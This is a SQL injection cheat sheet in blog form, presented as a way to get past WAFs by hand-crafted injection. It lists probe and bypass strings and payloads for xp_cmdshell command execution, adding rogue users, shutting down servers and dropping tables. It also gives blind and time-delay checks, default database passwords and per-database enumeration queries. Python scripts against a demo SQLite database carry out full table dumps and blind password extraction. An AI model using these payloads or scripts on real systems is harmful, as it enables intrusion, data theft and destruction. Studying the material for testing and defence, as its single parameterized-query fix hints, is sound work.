
Common SQL Injection Detection Statements

2016-04-26 12:40

0x00 Preface

Many WAFs now block the traffic generated by injection tools such as sqlmap and Havij, so in those cases we fall back to manual injection from the browser with the HackBar extension, that is, crafting the injection by hand to get past the WAF.

0x01 Finding SQL injection

1 Breaking the query syntax: single quote ( ' ), double quote ( " )

2 SQL comment injection: double hyphen ( -- ), hash ( # ), block comment ( /* ). MySQL only treats -- as a comment when whitespace follows it, and # is MySQL-specific.

3 Stacked/appended queries: semicolon ( ; ). Whether the second statement actually runs depends on the DBMS and the driver: MS-SQL and PostgreSQL accept stacked statements, while many MySQL drivers send one statement per call.

4 Injection/filter bypass: use CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT() and NULL to express the characters above without typing them literally.
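The four probe classes above, run end to end as an added example that is not part of the original post: a Python script with an in-memory SQLite database standing in for the back end. SQLite, the users table and its two rows are assumptions; SQLite's dialect differs from the MySQL and MS-SQL the post targets (no # comment, and Python's sqlite3 driver refuses stacked statements), which is itself part of what the probes reveal. The classification is the one a manual tester applies by eye: a database error means the probe reached the parser, more rows than the baseline means the WHERE logic was rewritten.

```python
import sqlite3


def make_db():
    """Constructed sample data; SQLite stands in for the real back end (assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE users (id INTEGER, name TEXT, password TEXT);"
        "INSERT INTO users VALUES (1,'admin','S3cret!'),(2,'bob','hunter2');"
    )
    return db


def vulnerable_lookup(db, name):
    """The flaw under test: input is concatenated into the SQL text, so the
    probe characters from 0x01 reach the parser instead of staying data."""
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()


def vulnerable_by_id(db, id_text):
    """Numeric context behind a naive quote filter: no quote is needed to
    leave the literal, and CHAR() spells a string without typing one."""
    if "'" in id_text or '"' in id_text:
        raise ValueError("quotes are not allowed")
    return db.execute("SELECT id, name FROM users WHERE id = " + id_text).fetchall()


def safe_lookup(db, name):
    """Hardened form: a bound parameter is data, never SQL syntax."""
    return db.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


def classify(db, probe):
    """Send one probe and read the outcome the way a tester reads the page:
    a syntax error means the probe reached the parser, more rows than the
    baseline means the WHERE logic was rewritten, and a rejected second
    statement means this driver does not run stacked queries."""
    baseline = vulnerable_lookup(db, "bob")
    try:
        rows = vulnerable_lookup(db, probe)
    except sqlite3.OperationalError as exc:
        return "syntax-error", str(exc)
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        return "stacked-rejected", str(exc)
    if len(rows) > len(baseline):
        return "logic-changed", rows
    return "normal", rows


PROBES = [
    "bob'",                        # 0x01 #1: unbalanced quote breaks the syntax
    'bob"',                        # a double quote is harmless inside a '...' literal
    "bob' OR '1'='1",              # tautology that re-balances the trailing quote
    "bob' OR 1=1-- ",              # 0x01 #2: -- comments out the trailing quote
    "bob' OR 1=1 /*",              # an unterminated block comment does the same
    "bob'; DROP TABLE users; --",  # 0x01 #3: stacked statement
]


def probe_all(db):
    """Verdict for every probe, keyed by the probe string."""
    return {p: classify(db, p)[0] for p in PROBES}


def char_bypass(db):
    """0x01 #4: CHAR(97,100,109,105,110) is 'admin' with no quote at all, so
    it passes the quote filter and matches the admin row as well as id 2."""
    return vulnerable_by_id(db, "2 OR name=CHAR(97,100,109,105,110)")


if __name__ == "__main__":
    db = make_db()
    for probe, verdict in probe_all(db).items():
        print(f"{verdict:16} <- {probe!r}")
    print("CHAR() bypass:", char_bypass(db))
    print("parameterized:", safe_lookup(db, "bob' OR 1=1-- "))
```

Against a real target the same loop is driven over HTTP and the "rows" signal becomes page length, a marker string or an error message; the decision rule does not change.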

0x02 Common SQL injection commands

1 UNION injection: UNION ALL SELECT NULL,NULL,... (one NULL per column; add NULLs until the column count matches the original SELECT and the error disappears)

2 Command execution (MS-SQL): 1;exec master..xp_cmdshell 'dir > C:\inetpub\wwwroot\dir.txt' (the procedure can also be written master.dbo.xp_cmdshell; it is disabled by default on modern versions)

3 Reading files: LOAD_FILE() (MySQL), UTL_FILE (Oracle) and utfReadfileAsTable

4 Adding a user: 1'; insert into users values('nto','nto123')-- (the trailing comment absorbs the application's closing quote)

5 DoS: 1';shutdown -- (MS-SQL SHUTDOWN stops the instance)

6 Getting the columns of a table (MS-SQL): select name from syscolumns where id=(select id from sysobjects where name='target table name') -- (a UNION can carry the result back)
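UNION injection (#1) and column enumeration (#6) carried through as one procedure, as an added example that is not part of the original post. It assumes SQLite as the back end and a constructed two-table schema; sqlite_master plays the role that information_schema.tables and sysobjects play in the per-DBMS queries in 0x04, and the injectable page is a numeric-context lookup that returns two columns.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data; SQLite stands in for the real back end (assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE users (id INTEGER, name TEXT, password TEXT);"
        "INSERT INTO users VALUES (1,'admin','S3cret!'),(2,'bob','hunter2');"
        "CREATE TABLE api_keys (owner TEXT, api_key TEXT);"
        "INSERT INTO api_keys VALUES ('alice','key-0001'),('svc','key-0002');"
    )
    return db


def vulnerable_page(db, id_text):
    """The injectable query: a numeric id concatenated into a two-column
    SELECT. The attacker only sees what this returns, so every UNION payload
    has to match its column count."""
    return db.execute("SELECT id, name FROM users WHERE id = " + id_text).fetchall()


def find_column_count(db, max_cols=10):
    """Step 1: append one NULL per column until the DBMS stops raising the
    column-count mismatch error. NULL is used because it is compatible with
    any column type."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            vulnerable_page(db, f"1 UNION ALL SELECT {nulls}")
            return n
        except sqlite3.OperationalError:
            continue  # "do not have the same number of result columns"
    return None


def pad(ncols, *exprs):
    """Fill the remaining columns with NULL so the injected SELECT lines up."""
    return ",".join(list(exprs) + ["NULL"] * (ncols - len(exprs)))


def list_tables(db, ncols):
    """Step 2: read the schema catalogue through the first column. id=-1 makes
    the legitimate query match nothing, so only injected rows come back."""
    rows = vulnerable_page(
        db, f"-1 UNION ALL SELECT {pad(ncols, 'name')} FROM sqlite_master WHERE type='table'"
    )
    return [r[0] for r in rows]


def list_columns(db, ncols, table):
    """Step 3: sqlite_master.sql holds the CREATE statement, from which the
    column names are parsed (MySQL would use column_name FROM
    information_schema.columns, MS-SQL the syscolumns query in #6)."""
    rows = vulnerable_page(
        db, f"-1 UNION ALL SELECT {pad(ncols, 'sql')} FROM sqlite_master WHERE name='{table}'"
    )
    body = re.search(r"\((.*)\)", rows[0][0], re.S).group(1)
    return [col.strip().split()[0] for col in body.split(",")]


def dump_table(db, ncols, table, cols):
    """Step 4: group_concat() packs every row into one cell, so even a page
    that renders a single result leaks the whole table in one request."""
    joined = " || ':' || ".join(cols)
    expr = f"group_concat({joined}, ';')"
    rows = vulnerable_page(db, f"-1 UNION ALL SELECT {pad(ncols, expr)} FROM {table}")
    return rows[0][0]


def loot(db):
    """Run the four steps and return every table as one packed string."""
    ncols = find_column_count(db)
    return {t: dump_table(db, ncols, t, list_columns(db, ncols, t))
            for t in list_tables(db, ncols)}


if __name__ == "__main__":
    for table, data in loot(make_db()).items():
        print(f"{table}: {data}")
```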

0x02 Common blind SQL injection commands

1 Quick check: AND 1=1, AND 1=0 (a true/false difference between the two responses gives you a boolean oracle)

2 Checking the user (MS-SQL): 1+AND+USER_NAME()='dbo' (the + is a URL-encoded space, as typed into HackBar)

3 Time delay (MS-SQL): 1;waitfor+delay+'0:0:10'

4 Checking for the sa login (MS-SQL; 115 is the ASCII code of 's'): (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

5 Delays on other back ends: BENCHMARK(count, expr) or SLEEP(seconds) (MySQL), pg_sleep(10) (PostgreSQL)
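The boolean-blind technique behind #1 and #4 above, as an added example that is not part of the original post: the page leaks one bit per request, and that bit is enough to read any scalar expression character by character. SQLite is assumed as the back end, with unicode()/substr()/length() standing in for ASCII()/SUBSTRING()/LEN(), and the sample rows are constructed. The time-based variants (#3, #5) use the same loop with the response delay as the oracle instead of the presence of a row.

```python
import sqlite3

REQUESTS = 0  # how many page requests an extraction costs


def make_db():
    """Constructed sample data; SQLite stands in for the real back end (assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE users (id INTEGER, name TEXT, password TEXT);"
        "INSERT INTO users VALUES (1,'admin','S3cret!'),(2,'bob','hunter2');"
    )
    return db


def page_shows_row(db, id_text):
    """The blind oracle. The injectable page either renders the row or it
    does not; no error text or data is echoed, only that one bit."""
    global REQUESTS
    REQUESTS += 1
    rows = db.execute("SELECT name FROM users WHERE id = " + id_text).fetchall()
    return len(rows) > 0


def ask(db, condition):
    """Turn a SQL boolean into one yes/no answer: id=1 AND (condition)."""
    return page_shows_row(db, "1 AND (" + condition + ")")


def quick_check(db):
    """#1 above: AND 1=1 must show the row and AND 1=0 must hide it. If both
    answers look the same, the parameter is not injectable this way or the
    page does not reflect the row count."""
    return ask(db, "1=1") and not ask(db, "1=0")


def extract_string(db, target_expr, max_len=64):
    """#4 above generalised: read any scalar SQL expression one character at
    a time. A binary search over the printable ASCII range costs about seven
    requests per character instead of up to 95 equality tests."""
    out = ""
    for i in range(1, max_len + 1):
        if not ask(db, f"length({target_expr}) >= {i}"):
            break  # past the end of the string
        lo, hi = 32, 126  # printable ASCII only, an assumption about the data
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(db, f"unicode(substr({target_expr},{i},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("injectable:", quick_check(db))
    secret = extract_string(db, "(SELECT password FROM users WHERE name='admin')")
    print("admin password:", secret, "in", REQUESTS, "requests")
```

On MS-SQL the same loop is spelled ASCII(SUBSTRING(expr, i, 1)) > mid with LEN(expr) for the length test; the sa check in #4 is just the first iteration with an equality test against 115.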

0x03 Default database accounts (user/password; <BLANK> means an empty password)

Oracle scott/tiger, dbsnmp/dbsnmp

MySQL mysql/<BLANK>, root/<BLANK>

PostgreSQL postgres/<BLANK>

MS-SQL sa/<BLANK>

DB2 db2admin/db2admin

0x04 Common SQL injection queries by back-end database

Each entry gives the expression to place after SELECT (or inside a UNION SELECT); the label says what it returns.

1 MySQL

Version: @@version

Users: * FROM mysql.user

Tables: table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Databases: DISTINCT(db) FROM mysql.db

Columns: table_schema, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_name = '<TABLENAME>'

Current user: user()

2 MS-SQL

Version: @@version

Users: name FROM master..syslogins

Tables: name FROM master..sysobjects WHERE xtype = 'U' (drop the master.. prefix to list the current database instead of master)

Databases: name FROM master..sysdatabases

Columns: name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLENAME>')

Current user: SYSTEM_USER or USER_NAME(); DB_NAME() returns the current database, not the user

3 Oracle

Version: banner FROM v$version WHERE banner LIKE 'Oracle%'

Users: * FROM dba_users (requires DBA rights; username FROM all_users works for any account)

Tables: table_name FROM all_tables

Schemas: DISTINCT owner FROM all_tables

Columns: column_name FROM all_tab_columns WHERE table_name='<TABLENAME>' (Oracle stores unquoted names in upper case)

Current user: user FROM dual

4 IBM DB2

Version: versionnumber FROM sysibm.sysversions

Users: user FROM sysibm.sysdummy1 (returns only the current user)

Tables: name FROM sysibm.systables

Schemas: schemaname FROM syscat.schemata

Columns: name, tbname, coltype FROM sysibm.syscolumns

Current user: user FROM sysibm.sysdummy1

5 PostgreSQL

Version: version()

Users: * FROM pg_user

Databases: datname FROM pg_database

Current user: user (or current_user)